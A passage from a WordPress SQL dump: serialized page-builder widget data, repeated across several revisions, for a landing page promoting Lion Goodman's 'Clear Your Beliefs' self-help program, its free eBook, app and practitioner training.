Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1103, 1593, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:425:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Learn how to help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1102, 1592, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2711:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.  \n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1104, 1594, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 